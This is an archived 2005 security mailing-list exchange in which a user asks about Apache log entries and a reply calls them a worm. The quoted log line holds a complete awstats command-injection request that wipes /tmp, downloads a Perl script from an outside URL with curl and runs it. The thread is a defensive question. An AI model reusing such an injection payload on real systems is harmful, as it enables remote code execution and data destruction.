Security Basics mailing list archives

Re: GET //awstats.pl? in apache logs

From: "Andreas Constantinides (MegaHz)" <megahz () megahz org>
Date: Mon, 24 Oct 2005 16:29:45 +0300

well just a worm
if u dont have awstats, no need to worry

-- Andreas

----- Original Message -----From: "Konstantine" <listclient () gmail com>

To: <security-basics () securityfocus com>
Sent: Saturday, October 22, 2005 12:33 AM
Subject: GET //awstats.pl? in apache logs

My apache logs show rows after rows of following, all from various IP
addresses. This started a couple of days ago. I don't have awstats.
Could somebody tell me what is that? Is there anything I should be
doing? thanks.K.
GET//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo|HTTP/1.1

Current thread:

GET //awstats.pl? in apache logs Konstantine (Oct 24)
- Re: GET //awstats.pl? in apache logs ilaiy (Oct 24)
- Re: GET //awstats.pl? in apache logs Andreas Constantinides (MegaHz) (Oct 24)
- Re: GET //awstats.pl? in apache logs FocusHacks (Oct 24)
- Re: GET //awstats.pl? in apache logs Can't dig that daddy (Oct 24)
  - RE: GET //awstats.pl? in apache logs mail list (Oct 24)
    - Message not available
    - Fwd: GET //awstats.pl? in apache logs Tobias Hahn (Oct 25)
- Re: GET //awstats.pl? in apache logs S.A. Birl (Oct 24)
  - Re: GET //awstats.pl? in apache logs Konstantine (Oct 25)
- <Possible follow-ups>
- Re: GET //awstats.pl? in apache logs [a] (Oct 24)